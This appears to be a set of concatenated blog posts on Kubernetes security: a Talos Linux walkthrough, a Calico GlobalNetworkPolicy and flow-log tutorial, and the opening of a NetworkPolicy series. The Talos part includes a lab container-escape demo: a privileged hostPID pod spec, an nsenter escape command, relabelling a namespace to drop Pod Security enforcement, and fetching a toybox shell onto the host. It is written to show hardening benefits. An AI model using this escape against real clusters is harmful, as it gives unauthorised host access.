Generate & apply machine config → installs Talos.
Bootstrap → Kubernetes up with Flannel.
Untaint → run nginx or any workload.

A clean, repeatable, single-node Kubernetes cluster in UTM.

A look underneath the hood of `talosctl`

One of the most obvious realizations about Talos is that talosctl is not special. It’s just a thin CLI wrapper over the Talos gRPC API. If you strip away the friendly command names, what’s left is a clean, strongly-typed API exposed by every node on port 50000.

The Talos API in a Nutshell

Transport: gRPC over HTTP/2
Auth: Mutual TLS
Port: 50000/tcp on every node
Schemas: Public .proto definitions available at siderolabs/talos/api

So talosconfig file is really just the Kubernetes kubeconfig equivalent:

Stores your CA, client cert, and key
Defines endpoints and nodes
Lets clients establish trust via mTLS

Why Bother?

As usual there is not a strong case to be made, but we like to understand the underpinnings of our tooling. Here are some possible ideas:

Custom automation: call Talos directly from Python apps.
Integration: wire Talos into CI/CD flows without needing to shell out to talosctl.
Observability/UI: build a dashboard or controller that queries node state (disks, services, time) and does stuff.

Example: `grpcurl`

With the certs in your talosconfig, you can hit the API directly. You can install gpgcurl and yq via brew if you're on a Mac.

A brief explanation of the above:

Export your Talos node IP as an environment variable.
Use yq to pull the CA cert, client cert, and client key out of your talosconfig and write them to a local folder.
Set file permissions so the client key is not world-readable.
Clone the Talos repo to grab the compiled .proto definitions (or use the included api/lock.binpb).
Run grpcurl with your certs and keys against port 50000 on the Talos node to query the gRPC API (e.g., machine.MachineService.DiskStats).

export TALOS_NODE=192.168.64.14

CONF=./talosconfig
CTX=talos_cluster
OUT=./talos-certs-2

mkdir -p "$OUT"

# CA cert
yq -r ".contexts[\"$CTX\"].ca.crt // .contexts[\"$CTX\"].ca" "$CONF" | base64 -d > "$OUT/ca.crt"

# Client cert
yq -r ".contexts[\"$CTX\"].client.crt // .contexts[\"$CTX\"].crt" "$CONF" | base64 -d > "$OUT/client.crt"

# Client key
yq -r ".contexts[\"$CTX\"].client.key // .contexts[\"$CTX\"].key" "$CONF" | base64 -d > "$OUT/client.key"

chmod 644 "$OUT/ca.crt" "$OUT/client.crt"
chmod 600 "$OUT/client.key"

git clone https://github.com/siderolabs/talos.git
cd talos


grpcurl \
  -cacert "../$OUT/ca.crt" \
  -cert   "../$OUT/client.crt" \
  -key    "../$OUT/client.key" \
  -protoset api/lock.binpb \
  $TALOS_NODE:50000 machine.MachineService.DiskStats

You should get something like the following:

...
        {
          "name": "vda",
          "readCompleted": "547",
          "readSectors": "14956",
          "readTimeMs": "167",
          "writeCompleted": "2782529",
          "writeMerged": "57361",
          "writeSectors": "20539233",
          "writeTimeMs": "2094027",
          "ioTimeMs": "1399624",
          "ioTimeWeightedMs": "2880919"
        },
...

As we can see. Talos isn’t “locked behind a CLI.” The API is the product. talosctl is just the usual client. If you want to integrate Talos and not use the CLI or write your own admin tooling, you can do it.

Machine Config as Code

Talos is the definition of immutable. The machine config is the source of truth. Instead of logging into a node and tweaking /etc or running apt install, you declare the entire state of the node in YAML. Talos enforces that state at boot and during runtime.

Generating the Config

You don’t write Talos configs by hand as we've seen. So quick recap.

They’re generated with talosctl:

talosctl gen config my-cluster https://:6443

This gives you three files:

controlplane.yaml — config for Kubernetes control plane nodes.
worker.yaml — config for worker nodes.
talosconfig — client-side file with API certs and endpoints for talosctl.

Control Plane vs Worker

Now we see we get two config files: controlplane.yaml and worker.yaml. The key difference is the machine.type field:

machine:
  type: controlplane   # or "worker"

Control plane nodes run the Kubernetes API server, scheduler, and controller manager.
Worker nodes join the cluster but don’t run control plane components.

Hey just Kubernetes. Of course in a single-node lab you only need controlplane.yaml. In a real cluster you’d apply controlplane.yaml to your controlplane nodes and worker.yaml everywhere else. Simple.

What Lives in the Config?

A Talos machine config is the playbook for a node:

Installation details — which disk to wipe and install onto.
Networking — DHCP or static IPs, routes, nameservers.
Cluster wiring — control plane endpoint, certs.
System knobs — kernel parameters, time servers, logging.
Access control — API roles defined by certificates.

Here is part of the config we generated for our lab controlplane.yaml:

machine:
  type: controlplane
  install:
    disk: /dev/vda
  network:
    interfaces:
      - interface: eth0
        dhcp: true
    nameservers:
      - 1.1.1.1
      - 8.8.8.8
cluster:
  controlPlane:
    endpoint: https://192.168.64.14:6443

Declarative Changes

You don’t SSH in and patch things. You:

Update the YAML.
Re-apply it with talosctl.

talosctl apply-config -n  -f controlplane.yaml

The node reconciles itself against the new config, rebooting if necessary.

Patching vs Full Reapply

For small tweaks, you don’t need to resend the whole config. Talos supports merge patches, much like Kubernetes:

talosctl apply-patch -n  --patch @patch.yaml

Example patch (changing DNS):

machine:
  network:
    nameservers:
      - 9.9.9.9

This updates just the nameservers field without touching the rest.

Drift Becomes a Non-Feature

With Talos, drift just… doesn’t exist. Nodes either match the declared config or they don’t boot properly. Consistency is the only way. The config is the authoritative spec for your node, API-enforced at runtime. Bam.

Security Posture Benefits

So we have an OS that won’t let you apt install or ssh in when things break. What do we get? From a security perspective, we get gold.

These examples might be a bit generic, but you get the point:

Smaller Attack Surface

There’s no SSH daemon to brute force, no shell to escape into, no random debug tools left lying around. Most of the usual entry points simply don’t exist.

No Runtime Drift

On a standard Linux host, persistence could unfold as follows: tweak /etc/ssh/sshd_config, drop a binary in /usr/bin, or install a package and you’ve changed the security model. On Talos, those directories are read-only at runtime. Anything outside of the declared machine config is wiped away on reboot.

Enforced Consistency

With Talos, “configuration drift” isn’t a problem to detect later. Nodes either match the declared config or they don’t come up. That consistency makes it much harder for subtle misconfigurations or shadow changes to slip by unnoticed.

API-Driven Access

Every interaction is authenticated and encrypted via gRPC with mTLS. There’s no “shared root password” floating around or keys to rotate.

Talos doesn’t make your Kubernetes cluster magically invincible. But by stripping away the common Linux attack surface and enforcing immutability at the OS level, it closes off whole categories of compromise before they even start.

Container Escape Fallout

I covered a container compromise path in my BSides Las Vegas talk. For this post we’ll skip straight to the next chapter: what happens after the escape, when the attacker lands on the host?

The usual way to simulate this is with nsenter from a privileged container.

Save the following spec as escape.yaml. The pod spec is set to have the right config for container escape and to use an image that already has nsenter.

apiVersion: v1
kind: Pod
metadata:
  name: escape
  labels:
    app: escape
spec:
  hostPID: true
  containers:
    - name: escape
      image: nicolaka/netshoot:latest
      command: ["sleep", "3600"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /
        type: Directory
  restartPolicy: Never

Escaping on an Ubuntu node

Apply the pod on a cluster with regular Ubuntu nodes:

kubectl apply -f escape.yaml

Then exec in, escape, and play around:

# Exec in
matt@controlplane:~/container_escape$ kubectl exec -it escape -- bash

# Escape
escape:~# nsenter --target 1 --mount --uts --ipc --net --pid

# We are in
# uname
Linux
# whoami
root
# cat /etc/os-release
PRETTY_NAME="Ubuntu 24.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.3 LTS (Noble Numbat)"
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=noble
LOGO=ubuntu-logo

Cool that is it. For kicks you could try some other stuff.

Install Tooling

Ubuntu host:

apt update && apt install -y nmap

Yes, tools. Try more.

Escaping on a Talos node

Try it out on your Talos node with our same escape pod. First thing you'll notice is it doesn't meet PSA standards.

matt.brown@matt Talos % kubectl apply -f escape.yaml
Error from server (Forbidden): error when creating "escape.yaml": pods "escape" is forbidden: violates PodSecurity "restricted:latest": host namespaces (hostPID=true), privileged (container "escape" must not set securityContext.privileged=true), allowPrivilegeEscalation != false (container "escape" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "escape" must set securityContext.capabilities.drop=["ALL"]), restricted volume types (volume "host-root" uses restricted volume type "hostPath"), runAsNonRoot != true (pod or container "escape" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "escape" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")

Ok, that’s annoying for a test, so let’s disable it to allow the pod to be created. Just change the label as follows:

kubectl label ns default pod-security.kubernetes.io/enforce=privileged --overwrite

Now apply it again and wait for your pod to spin up. Then try to escape again.

matt.brown@matt Talos % kubectl exec -it escape -- /bin/bash
escape:~# nsenter --target 1 --mount --uts --ipc --net --pid
nsenter: failed to execute /bin/sh: No such file or directory
escape:~#

Ok, this is annoying again, but not unexpected since the host doesn’t have the binary. Let's try a workaround. We'll use the toybox binary and leverage its shell capabilities:

# Get the toybox binary
escape:~# curl -L -o toybox-aarch64 https://landley.net/toybox/downloads/binaries/latest/toybox-aarch64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  897k  100  897k    0     0  1162k      0 --:--:-- --:--:-- --:--:-- 1162k
escape:~# chmod +x toybox-aarch64

# Escape using toybox binary
escape:~# nsenter --target 1 --mount --uts --ipc --net --pid -- \
  /var/tmp/repro/toybox-aarch64 sh -i

# Check the OS and try some stuff
$ cat /etc/os-release
NAME="Talos"
ID=talos
VERSION_ID=v1.11.0
PRETTY_NAME="Talos (v1.11.0)"
HOME_URL="https://www.talos.dev/"
BUG_REPORT_URL="https://github.com/siderolabs/talos/issues"
VENDOR_NAME="Sidero Labs"
VENDOR_URL="https://www.siderolabs.com/"
$ apt install
sh: apt: No such file or directory
$ echo "haxx" > /etc/talos-test
sh: /etc/talos-test: Read-only file system

Try other stuff and you'll see it is tightly locked down.

Escaping a container onto a typical Linux host is obviously not a good thing. Attackers get a full OS to play with, as we saw with the Ubuntu instance. Escaping onto Talos leaves them with… nothing useful. No packages, no persistence, etc. The blast radius is dramatically smaller. And we don't have game over for the whole cluster.

Wrap Up

I hoped this helped with getting a better understanding of Talos Linux. Talos strips away the usual chaos of a Linux host and leaves you with something closer to an appliance than an OS. On a regular Ubuntu node, escaping a container means you inherit a full operating system: shells, package managers, writable configs, and endless persistence tricks. On Talos, the same move drops you into a read-only world with no apt, no /etc changes, and no way to make anything stick past a reboot.

That difference is the point. Talos trades flexibility for predictability. You don’t get the comfort of tinkering when things break, but you also don’t get the mess of drift or attackers turning a one-off compromise into a permanent foothold. Instead, every node is defined by YAML, accessed by an API, and reset to its declared state at boot.

It’s not a platform for hobbyist debugging, but it is a strong foundation for the real world where consistency and security matter more than convenience. Talos makes Kubernetes boring, and that's not such a bad thing.

It you're exploring the immutable space, Talos is absolutely worth the time. It delivers on the promise of a minimal, locked-down base that is purpose-built for Kubernetes, rather than retrofitted from a general-purpose distro. If your goal is to cut drift, reduce your attack surface, and manage clusters as code (isn't that everyone's goal?), Talos fits neatly into that toolkit. There is of course a lot more to Talos, so definitely check it out.

Service Boundaries: Scaling with Calico

Matt Brown — Wed, 03 Sep 2025 22:43:59 GMT

In Part 1 we took Kubernetes from “wide open by default” to a clean three-hop app chain. With a handful of NetworkPolicy manifests we locked the cluster down to just the flows the app actually needs: frontend → backend → database, plus DNS. Everything else? Nuke it.

That’s definitely a good start. But here’s the catch (always with the catch): what happens when you’re running a host of namespaces and services? Copy-pasting the same default-deny and DNS carve-outs everywhere doesn’t scale. Neither does sprinkling external CIDRs into random policies every time something needs to call an outside system.

This is where Calico steps in. It takes the same NetworkPolicy model you already know (and now love) and adds the missing pieces for real-world operations:

Global guardrails so you can enforce a cluster-wide baseline once.
Flow logs so you can actually see what’s being allowed and denied.

In other words, Calico isn’t a replacement for NetworkPolicy — it’s the natural next layer. It lets you move from blog-sized policies to real boundaries without drowning in YAML.

What the Hell Is Calico?

If you’ve been around Kubernetes for five minutes, you’ve probably seen the name Calico. For me, it started as the dead-simple CNI for my local kubeadm clusters: just wire up pod networking and get on with life. But as I dug deeper into NetworkPolicy, I noticed Calico showing up again. This time not just as plumbing, but as an add-on for security and visibility. So… what's the real deal?

At its core, Calico is both a networking layer and a security layer for Kubernetes. But it is really a full platform that can still act as your CNI, but also enforce policies, define global defaults, manage external networks, and generate flow logs for visibility. In other words, everything you learned with NetworkPolicy in Part 1 still applies, but Calico adds the missing pieces to make those guardrails scale across real clusters.

Today, Calico can:

Enforce Kubernetes NetworkPolicy natively, just like the baseline rules we used in Part 1.
Extend those policies with Calico-only features like GlobalNetworkPolicy.
Provide flow logs and observability, so you can see what’s being allowed or denied.

The important thing to know: you don’t need to swap out Kubernetes concepts to use Calico. It still understands NetworkPolicy. It just adds the missing pieces that make policies usable at scale.

Global Guardrails

In Part 1 we locked down a simple three-tier app (frontend → backend → database) using Kubernetes NetworkPolicy. That worked well for a demo, but it quickly gets annoying when you move beyond a single app. Each namespace needs its own copy of the same baseline: default-deny, DNS egress, and the handful of allowed flows. Good luck keeping that up.

This is where Calico’s GlobalNetworkPolicy comes in. Unlike standard NetworkPolicy, which only applies inside a single namespace, a GlobalNetworkPolicy is enforced cluster-wide. That means you can set a universal default-deny once, or a universal DNS allow, and not worry about duplicating YAML everywhere. Sounds useful.

Here’s a simple example: a cluster-wide default-deny for all ingress and egress. Similar to our NetworkPolicy, but now it's global. We do carve out exceptions for the important namespaces. Save it as global_networkpolicy_deny.yaml.

apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: 00-default-deny
spec:
  namespaceSelector: "kubernetes.io/metadata.name not in {'kube-system','calico-system','calico-apiserver','tigera-operator'}"
  types: [Ingress, Egress]
  ingress: []
  egress: []

With that in place, every workload in the cluster is locked down by default. Let's give it a try.

Lab only or chaos will ensue. And even in the lab chaos can ensue without the namespaceSelector. An hour wasted, trust me.

Start by applying the policy:

matt@controlplane:~/calico$ kubectl apply -f global_networkpolicy_deny.yaml
globalnetworkpolicy.projectcalico.org/default-deny created

Next, let's run the same test as we did in Part 1.

matt@controlplane:~/calico$ kubectl run -n frontend test --image=nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
curl: (6) Could not resolve host: api.backend.svc.cluster.local

It just works.

You'll notice we’re no longer using networking.k8s.io/v1/NetworkPolicy and are now taking advantage of the cool stuff Calico provides. Calico introduces its own Custom Resource Definitions (CRDs) for extended policy objects. Of course, that's why the YAML here says apiVersion: projectcalico.org/v3. So what does our CRD look like?

Do a quick check at the top of our CRD:

kubectl get crd globalnetworkpolicies.crd.projectcalico.org -o yaml | head -15

And sure enough, our loyal feline has installed a CRD just for this:

apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  name: globalnetworkpolicies.crd.projectcalico.org
spec:
  group: projectcalico.org
  names:
    kind: GlobalNetworkPolicy
    plural: globalnetworkpolicies
    singular: globalnetworkpolicy
  scope: Cluster
  versions:
  - name: v3
    served: true
    storage: true

That names.kind: GlobalNetworkPolicy is the important part: it defines a new top-level resource that extends Kubernetes network policy to the entire cluster. This CRD is what makes the apiVersion: projectcalico.org/v3 YAML valid, and it connects directly into the same enforcement pipeline you saw with native NetworkPolicy. The difference is scope! Instead of being limited to a single namespace, GlobalNetworkPolicy applies consistently across every namespace in the cluster.

So where do we need to go?

DNS Under Global Default-Deny (Calico)

As soon as you flip on a global default-deny, the first thing that quietly dies is DNS. Service lookups stop working, external names can’t resolve, and suddenly every other test fails for mysterious reasons. Yes, I'm repeating Part 1.

That’s because DNS is just another flow — but it’s one that every pod in the cluster depends on. So before we can even think about app-to-app traffic, we need to carve DNS back out at the global level.

Two things must happen for lookups to work end-to-end:

Workloads must be allowed to query CoreDNS (egress 53/UDP+TCP).
CoreDNS itself must be allowed to talk out — to the kube-apiserver (TCP/443) for watching Services/Endpoints, and to any upstream DNS resolvers it forwards to (53/UDP+TCP).

Primer on `order`

Once you move to Calico, policies aren’t just namespace-scoped lists, they’re evaluated by order.

Lower numbers = higher priority.
The first policy that matches and has a decisive action wins.
The global default-deny can omit order and be last.
DNS carve-outs need to sit at a slightly higher order (e.g. 20 and 21) so they apply before the deny.

Think of it like firewall rules: you want your DNS “allow” rules above the blanket “deny everything” rule.

The YAML

Below is a single file that sets up two global policies: one for client pods to reach CoreDNS, and another for CoreDNS itself to reach the API server and upstream resolvers.

apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: 01-dns-clients-egress
spec:
  order: 20
  selector: "all()"
  types: [Egress]
  egress:
    - action: Allow
      protocol: UDP
      destination:
        selector: '(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'
        ports: [53]
    - action: Allow
      protocol: TCP
      destination:
        selector: '(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'
        ports: [53]
---
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: 02-dns-core
spec:
  order: 21
  selector: '(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'
  types: [Ingress, Egress]
  ingress:
    - action: Allow
      protocol: UDP
      source:
        selector: "all()"
      destination:
        ports: [53]
    - action: Allow
      protocol: TCP
      source:
        selector: "all()"
      destination:
        ports: [53]
  egress:
    # kube-apiserver Service IP (replace if different; often 10.96.0.1)
    - action: Allow
      protocol: TCP
      destination:
        nets: ["10.96.0.1/32"]
        ports: [443]
    # Upstream DNS resolvers (replace with your real upstreams)
    - action: Allow
      protocol: UDP
      destination:
        nets: ["8.8.8.8/32","8.8.4.4/32"]
        ports: [53]
    - action: Allow
      protocol: TCP
      destination:
        nets: ["8.8.8.8/32","8.8.4.4/32"]
        ports: [53]

What this does

Clients → CoreDNS: any pod can send DNS queries to the DNS pods on UDP/TCP 53.
Ingress into CoreDNS: opens 53 on DNS pods so queries aren’t dropped when ingress is enforced.
CoreDNS → API server: lets CoreDNS watch Service/Endpoint changes on TCP/443 (required for cluster-local names).
CoreDNS → upstream resolvers: if CoreDNS forwards externals, allow 53/UDP+TCP to those IPs (demo uses Google DNS; swap for your own).

Tips

Find the API server ClusterIP:

  kubectl get svc kubernetes -n default -o jsonpath='{.spec.clusterIP}'

Match CoreDNS labels on any distro:
'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'

Test quickly:

  kubectl run -n backend test --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
  dig +short kubernetes.default.svc.cluster.local
  dig +short google.com

Straight to Business

With this in place, DNS is restored across the cluster while the global default-deny remains active. Instead of sprinkling DNS exceptions into every namespace, you do it once globally — less YAML, fewer mistakes.

So now we’re at:

Global default-deny: in place and enforced.
Global DNS allow: carved out so names resolve cluster-wide.

That’s the baseline. Next up: app traffic.

App Flows Under Global Deny

Recall from Part 1, our clean three‑tier app chain: frontend → backend → database. Those namespace‑scoped NetworkPolicy objects worked great on their own.

But once you enable a Global Default‑Deny, those app flows no longer work. The global policy applies everywhere, so even the frontend can’t reach the backend unless you explicitly make space for it.

So what do you do? You’ve got at least two main paths forward.

Option A — Keep Kubernetes `NetworkPolicy` Working

The simplest way is to exclude your app namespaces from the global deny. That way, frontend, backend, and db continue to be governed by the native policies you wrote in Part 1. Everywhere else in the cluster stays locked down.

apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: 00-default-deny
spec:
  order: 10
  namespaceSelector: "kubernetes.io/metadata.name not in {'kube-system','calico-system','calico-apiserver','tigera-operator','frontend','backend','db'}"
  types: [Ingress, Egress]
  ingress: []
  egress: []

I would assess this as not even that good for quick labs and definitely not for scale.

Option B — Calico Globals (with explicit ingress and egress)

Re-express the app flows as Calico GlobalNetworkPolicies with order so they evaluate before the global deny. You must allow both directions: permit ingress on the destination tier and egress from the source tier. This is not too different from our previous network policies.

Frontend → Backend (HTTP :80)

apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: 09-frontend-egress-to-backend
spec:
  tier: default
  order: 9
  selector: projectcalico.org/namespace == "frontend"  
  types: [Egress]
  egress:
    - action: Allow
      protocol: TCP
      destination:
        selector: app == "api"                      
        ports: [80]
---
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: 09-backend-ingress-from-frontend
spec:
  tier: default
  order: 9
  selector: app == "api"                              
  types: [Ingress]
  ingress:
    - action: Allow
      protocol: TCP
      source:
        namespaceSelector: projectcalico.org/name == "frontend"
      destination:
        ports: [80]

Backend → Database (TCP :5432)

# Database INGRESS from Backend
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: 09-allow-backend-to-db-ingress
spec:
  order: 9
  selector: app == "db"
  types: [Ingress]
  ingress:
    - action: Allow
      protocol: TCP
      source:
        selector: app == "api"   # backend pods
      destination:
        ports: [5432]
---
# Backend EGRESS to Database
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: 09-allow-backend-to-db-egress
spec:
  order: 9
  selector: app == "api"
  types: [Egress]
  egress:
    - action: Allow
      protocol: TCP
      destination:
        selector: app == "db"
        ports: [5432]

With these in place, your global deny still sets the baseline for the cluster, but these app‑specific allows at order: 9 carve out the necessary paths cleanly.

App Flows Under Global Deny — Option C (Tiers)

So far, we’ve looked at two ways to carve out app flows under a cluster-wide default-deny. But there’s a third way that is more Calico: tiers.

What are tiers?

Calico evaluates policies by tier, then by order.

Tier = high-level category (e.g., baseline, app, security).
Order = numeric priority within a tier (lower runs first).

This lets you separate “cluster guardrails” from “app-specific rules” so they don’t trip over each other. Think of tiers like folders: guardrail policies go in one, app rules in another. The engine then processes them in order, tier by tier.

Creating tiers

Define tiers once:

apiVersion: projectcalico.org/v3
kind: Tier
metadata:
  name: app
spec: { order: 20 }
---
apiVersion: projectcalico.org/v3
kind: Tier
metadata:
  name: baseline
spec: { order: 100 }

app tier (order 20): higher priority, runs before baseline.
baseline tier (order 100): lower priority, catches everything else.

App flows in the `app` tier

Here, we recreate frontend→backend and backend→db flows, but put them in the app tier:

# Frontend → Backend
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: app-frontend-to-backend
spec:
  tier: app
  order: 10
  selector: projectcalico.org/namespace == "frontend"
  types: [Egress]
  egress:
    - action: Allow
      protocol: TCP
      destination:
        selector: app == "api"
        ports: [80]
---
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: app-backend-ingress
spec:
  tier: app
  order: 10
  selector: app == "api"
  types: [Ingress]
  ingress:
    - action: Allow
      protocol: TCP
      source:
        namespaceSelector: projectcalico.org/name == "frontend"
      destination:
        ports: [80]
---
# Backend → DB
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: app-backend-to-db
spec:
  tier: app
  order: 10
  selector: projectcalico.org/namespace == "backend"
  types: [Egress]
  egress:
    - action: Allow
      protocol: TCP
      destination:
        selector: app == "db"
        ports: [5432]
---
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: app-db-ingress
spec:
  tier: app
  order: 10
  selector: app == "db"
  types: [Ingress]
  ingress:
    - action: Allow
      protocol: TCP
      source:
        namespaceSelector: projectcalico.org/name == "backend"
      destination:
        ports: [5432]

Guardrails in the `baseline` tier

Default-deny stays at the baseline tier:

apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: baseline-default-deny
spec:
  tier: baseline
  selector: all()
  types: [Ingress, Egress]
  ingress: []
  egress: []

I didn't document the creation and validation of this last option as we are just getting more of the same. But it should be clear how they help.

Clear separation: app rules live in app, guardrails in baseline.
Predictability: app policies are evaluated first; anything not allowed there hits the baseline deny.
Scale: you can add more tiers later (e.g., security for IDS/IPS-style rules) without mixing concerns.

In other words, tiers give you a clean “policy hierarchy” instead of one giant pile of YAML. They are definitely the best out of our three options.

Seeing Flows with Calico Logs

At this point we’ve put relevant guardrails in place:

Cluster-wide deny + DNS allow (GlobalNetworkPolicy).
App-specific flows (frontend ↔ backend ↔ db) just like Part 1.

But how do you know what’s really happening? Did the policy work? What got blocked, and what slipped through?

This is where Calico’s flow logs come in — and yeah, I admit it, I love logs. They give you clear L3/L4 traffic visibility along with the exact Calico policies that allowed or denied each connection. It’s a newer feature, but one of the most valuable additions to Calico’s policy toolkit.

Enabling Flow Logs

If you're not using the latest and greatest Calico, ensure you upgrade. Just download two definition files and update. Took me a while to figure out I needed some new CRDs that are only on the newest version.

You need to enable Goldmane (I assume it came from the MTG card?) for the logging API and Whisker for the nice little UI that uses Goldmane logging:

kubectl apply -f - <


To get this working in the lab you will most likely want to create a NodePort service for Whisker (your UI for flow logs) as it just uses ClusterIP by default. I found this a bit tricky, because my first instinct was to try to get this done by patching the existing service. However, since this follows an operator you'll need to create a new service entirely. Failing to do so will cause your service to revert. Create the following Service in the calico-system namespace via a saved file called whisker-nodeport.yaml:
apiVersion: v1
kind: Service
metadata:
  name: whisker-nodeport
  namespace: calico-system
spec:
  type: NodePort
  ports:
  - port: 8081
    protocol: TCP
    targetPort: 8081
    nodePort: 30082 #Or whatever you so desire, even nothing at all
  selector:
    k8s-app: whisker

Apply as usual via kubectl apply -f whisker-nodeport.yaml.
Ready to roll.
Well, not quite. As we're working on network policies, it is a bit ironic that I found Whisker creates its own network policy, so trying to access it from your local machine or anywhere outside the node that is hosting Whisker will not work. So we need to carve out an exception. I just did a full exception but you might consider narrowing the ingress allowance. Create the following NetworkPolicy in the calico-system namespace via a saved file called whisker-np-allow.yaml:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: whisker-nodeport-allow
  namespace: calico-system
spec:
  podSelector:
    matchLabels:
      app.kubernetes.io/name: whisker
  policyTypes: [Ingress]
  ingress:
    - ports:
        - protocol: TCP
          port: 8081

Apply as usual via kubectl apply -f whisker-np-allow.yaml. And now you should be able to navigate to your service using something like http://192.168.64.7:30082!

Checking the Logs
Now generate some traffic as we did at the start:
matt@controlplane:~/calico$ kubectl run -n frontend test --image=nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80



Welcome to nginx!



Welcome to nginx!
If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.

For online documentation and support please refer to
nginx.org.

Commercial support is available at
nginx.com.

Thank you for using nginx.



Now you should see some logs. Filter for Destination Namespace of backend and you should see something similar.

Cool, we can see that worked. Now let’s try something that doesn’t work. We’ll go ahead and do the same netshoot test, but this time make a call to the backend service from the default namespace.
matt@controlplane:~/np$ kubectl run test --image=nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80

This will fail based on our network policies. So let’s see what Whisker shows.

Reading the Flow Log Verdict
Here’s the example trace from Whisker when our traffic got denied:
{
  "enforced": [
    {
      "kind": "EndOfTier",
      "name": "",
      "namespace": "",
      "tier": "default",
      "action": "Deny",
      "policy_index": 0,
      "rule_index": -1,
      "trigger": {
        "kind": "GlobalNetworkPolicy",
        "name": "default-deny",
        "namespace": "",
        "tier": "default",
        "action": "ActionUnspecified",
        "policy_index": 0,
        "rule_index": 0,
        "trigger": null
      }
    }
  ],
  "pending": [
    {
      "kind": "EndOfTier",
      "name": "",
      "namespace": "",
      "tier": "default",
      "action": "Deny",
      "policy_index": 0,
      "rule_index": -1,
      "trigger": {
        "kind": "GlobalNetworkPolicy",
        "name": "01-dns-clients-egress",
        "namespace": "",
        "tier": "default",
        "action": "ActionUnspecified",
        "policy_index": 0,
        "rule_index": 0,
        "trigger": null
      }
    }
  ]
}

What this is telling us:

Enforced: the cluster-wide GlobalNetworkPolicy/default-deny in the default tier denied the connection. No preceding allow matched, so the blanket deny won.

Pending: GlobalNetworkPolicy/01-dns-clients-egress was evaluated but didn’t apply (this traffic wasn’t DNS, so that allow rule wasn’t relevant).

Bottom line: the request was denied by the global default-deny; no app allow matched first, and unrelated DNS allow rules won’t help an HTTP call.



If you run the curl from the frontend namespace, you’ll typically see your app allow (e.g., frontend→backend) in pending when selectors don’t match — which is a clearer illustration of “the allow didn’t match, so default-deny fired.” Right now, the pending entry is your DNS policy because the request wasn’t DNS.


Beyond the Lab
The lab shows how Calico fills in the gaps left by raw NetworkPolicy. If you’re already running Calico as your CNI, you may have a lot of these features sitting idle without realizing it. Calico isn't just there to hand out pod IPs and push packets around. That’s fine, but it means you’re leaving value on the table:

Global guardrails: set default-deny and DNS once, not in every namespace. It’s already in the box.


Tiered policies: you can define guardrails at the top, app-specific rules later, and catch everything else at the end.

Flow logs: new in Calico, and genuinely useful for visibility.


Driving Calico only as a CNI is like leaving a stick-shift supercar in first gear. And sorry, there’s no automatic mode in the CNI world. And yes, the cat theme is a bit much — Calico, Tigera, Felix, Whisker, Goldmane — but at least the features deliver.

Coming Up Next
We’ve now gone deep on Kubernetes NetworkPolicy and Calico’s extensions. Next up: Cilium.
Cilium takes a different tack, promising kernel-level enforcement, API-aware observability, and a whole lot of coolness. In the final part of this series we’ll look at how Cilium stacks up.



Service Boundaries: Kubernetes NetworkPolicy Basics
Matt Brown — Wed, 27 Aug 2025 22:42:46 GMT
By default, Kubernetes is wide open. Of course you knew that already. Any pod can talk to any other pod, in any namespace, on any port. That makes life easy for anyone putting an app into prod, and just as easy for anyone who compromises one workload. Once they’re in, nothing stops them from laterally probing every service in the cluster.  
So I went down the path of figuring out how to build meaningful guardrails. The answer is service boundaries. Sounds complicated, but it really comes down to network policies. I’d heard about them, and I’d messed with CNIs like Calico and Cilium while setting up clusters, but hadn’t gone deep on what those policies could actually enforce.  
That naturally led to the fact that you need policies that describe which pods should be talking to which other pods, and on what ports. Everything else gets dropped. The built-in tool for this is NetworkPolicy. With a few YAML manifests, you can flip a cluster from “anyone can connect to anything” into “deny by default, allow only what we mean.”
This is the start of a three-part series on service boundaries in Kubernetes:  

Part 1: Native NetworkPolicy for baseline L3/L4 segmentation.  
Part 2: Scaling boundaries with Calico’s global defaults and external allowlists.  
Part 3: Intent-aware controls with Cilium and Hubble for L7 enforcement.  

